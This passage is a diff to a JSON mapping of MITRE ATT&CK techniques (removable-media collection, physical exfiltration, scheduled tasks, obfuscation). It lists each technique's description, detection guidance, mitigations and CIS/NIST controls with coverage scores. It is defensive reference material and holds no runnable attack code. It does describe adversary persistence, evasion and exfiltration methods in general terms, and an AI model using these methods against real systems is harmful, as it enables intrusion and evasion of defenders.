             "Command: Command Execution",
-            "Process: OS API Execution",
-            "Process: Process Creation"
+            "Logon Session: Logon Session Creation",
+            "Network Traffic: Network Connection Creation",
+            "Process: Process Creation",
+            "Service: Service Metadata"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1021",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.17619047619047618,
-        "adjusted_score": 0.17619047619047618,
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.5190476190476191,
+        "adjusted_score": 0.5190476190476191,
         "has_car": true,
         "has_sigma": true,
-        "has_es_siem": true,
+        "has_es_siem": false,
         "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [],
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "3.12",
+            "4.1",
+            "4.4",
+            "4.5",
+            "4.7",
+            "4.8",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "7.6",
+            "7.7",
+            "12.2",
+            "12.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "RA-5",
+            "SC-46",
+            "SC-7",
+            "SI-4"
+        ],
         "process_coverage": true,
-        "network_coverage": false,
-        "file_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.07619047619047618,
-            "detection_score": 0.16
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1052",
-        "name": "Exfiltration Over Physical Medium",
-        "description": "Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.",
-        "url": "https://attack.mitre.org/techniques/T1052",
+        "tid": "T1025",
+        "name": "Data from Removable Media",
+        "description": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.",
+        "url": "https://attack.mitre.org/techniques/T1025",
         "tactics": [
-            "Exfiltration"
+            "Collection"
         ],
-        "detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.",
+        "detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
         "platforms": [
             "Linux",
             "Windows",
@@ -2726,733 +3023,313 @@
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Drive: Drive Creation",
-            "File: File Access",
-            "Process: Process Creation"
+            "File: File Access"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1052.001",
-                "name": "Exfiltration Over Physical Medium: Exfiltration over USB",
-                "url": "https://attack.mitre.org/techniques/T1052/001",
-                "description": "Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.",
-                "detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.",
-                "mitigations": [
-                    {
-                        "mid": "M1057",
-                        "name": "Data Loss Prevention",
-                        "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
-                        "url": "https://attack.mitre.org/mitigations/M1057"
-                    },
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1034",
-                        "name": "Limit Hardware Installation",
-                        "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.",
-                        "url": "https://attack.mitre.org/mitigations/M1034"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
+        "subtechniques": [],
+        "mitigations": [
             {
                 "mid": "M1057",
                 "name": "Data Loss Prevention",
                 "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
                 "url": "https://attack.mitre.org/mitigations/M1057"
-            },
-            {
-                "mid": "M1042",
-                "name": "Disable or Remove Feature or Program",
-                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                "url": "https://attack.mitre.org/mitigations/M1042"
-            },
-            {
-                "mid": "M1034",
-                "name": "Limit Hardware Installation",
-                "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.",
-                "url": "https://attack.mitre.org/mitigations/M1034"
             }
         ],
-        "cumulative_score": 0.3380952380952381,
-        "adjusted_score": 0.3380952380952381,
+        "cumulative_score": 0.24285714285714285,
+        "adjusted_score": 0.24285714285714285,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "2.3",
-            "2.5",
-            "4.1",
-            "10.3",
-            "18.3",
-            "18.5"
-        ],
+        "cis_controls": [],
         "nist_controls": [
             "AC-16",
             "AC-2",
-            "AC-20",
             "AC-23",
             "AC-3",
             "AC-6",
-            "CA-7",
-            "CM-2",
-            "CM-6",
-            "CM-7",
-            "CM-8",
+            "CM-12",
+            "CP-9",
             "MP-7",
-            "RA-5",
             "SA-8",
+            "SC-13",
             "SC-28",
+            "SC-38",
             "SC-41",
             "SI-3",
-            "SI-4",
-            "SR-4"
+            "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true,
+        "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.2380952380952381,
-            "mitigation_score": 0.45454545454545453
+            "combined_score": 0.14285714285714285,
+            "mitigation_score": 0.2727272727272727
         },
         "choke_point_score": 0.1,
         "prevalence_score": 0
     },
     {
-        "tid": "T1053",
-        "name": "Scheduled Task/Job",
-        "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).",
-        "url": "https://attack.mitre.org/techniques/T1053",
+        "tid": "T1027",
+        "name": "Obfuscated Files or Information",
+        "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ",
+        "url": "https://attack.mitre.org/techniques/T1027",
         "tactics": [
-            "Execution",
-            "Persistence",
-            "Privilege Escalation"
+            "Defense Evasion"
         ],
-        "detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+        "detection": "Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). \n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) \n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. \n\nThe first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network. ",
         "platforms": [
-            "Containers",
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Container: Container Creation",
             "File: File Creation",
-            "File: File Modification",
-            "Process: Process Creation",
-            "Scheduled Job: Scheduled Job Creation"
+            "File: File Metadata",
+            "Process: Process Creation"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1053.001",
-                "name": "Scheduled Task/Job: At (Linux)",
-                "url": "https://attack.mitre.org/techniques/T1053/001",
-                "description": "Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)\n\nAn adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.\n\nAdversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)",
-                "detection": "Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nReview all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)\n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
+                "tid": "T1027.001",
+                "name": "Obfuscated Files or Information: Binary Padding",
+                "url": "https://attack.mitre.org/techniques/T1027/001",
+                "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ",
+                "detection": "Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool.  When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. ",
+                "mitigations": []
             },
             {
-                "tid": "T1053.002",
-                "name": "Scheduled Task/Job: At (Windows)",
-                "url": "https://attack.mitre.org/techniques/T1053/002",
-                "description": "Adversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. \n\nAn adversary may use at.exe in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).\n\nNote: The at.exe command line utility has been deprecated in current versions of Windows in favor of schtasks.",
-                "detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
+                "tid": "T1027.002",
+                "name": "Obfuscated Files or Information: Software Packing",
+                "url": "https://attack.mitre.org/techniques/T1027/002",
+                "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.  ",
+                "detection": "Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1049",
+                        "name": "Antivirus/Antimalware",
+                        "description": "Use signatures or heuristics to detect malicious software.",
+                        "url": "https://attack.mitre.org/mitigations/M1049"
                     }
                 ]
             },
             {
-                "tid": "T1053.003",
-                "name": "Scheduled Task/Job: Cron",
-                "url": "https://attack.mitre.org/techniques/T1053/003",
-                "description": "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems.  The  crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\n\nAn adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. ",
-                "detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.  \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. ",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
+                "tid": "T1027.003",
+                "name": "Obfuscated Files or Information: Steganography",
+                "url": "https://attack.mitre.org/techniques/T1027/003",
+                "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  ",
+                "detection": "Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.",
+                "mitigations": []
             },
             {
-                "tid": "T1053.005",
-                "name": "Scheduled Task/Job: Scheduled Task",
-                "url": "https://attack.mitre.org/techniques/T1053/005",
-                "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).",
-                "detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
+                "tid": "T1027.004",
+                "name": "Obfuscated Files or Information: Compile After Delivery",
+                "url": "https://attack.mitre.org/techniques/T1027/004",
+                "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)",
+                "detection": "Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.",
+                "mitigations": []
             },
             {
-                "tid": "T1053.006",
-                "name": "Scheduled Task/Job: Systemd Timers",
-                "url": "https://attack.mitre.org/techniques/T1053/006",
-                "description": "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)\n\nEach .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.\n\nAn adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.",
-                "detection": "Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.\n\nSuspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAudit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)",
-                "mitigations": [
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
+                "tid": "T1027.005",
+                "name": "Obfuscated Files or Information: Indicator Removal from Tools",
+                "url": "https://attack.mitre.org/techniques/T1027/005",
+                "description": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.",
+                "detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.",
+                "mitigations": []
             },
             {
-                "tid": "T1053.007",
-                "name": "Scheduled Task/Job: Container Orchestration Job",
-                "url": "https://attack.mitre.org/techniques/T1053/007",
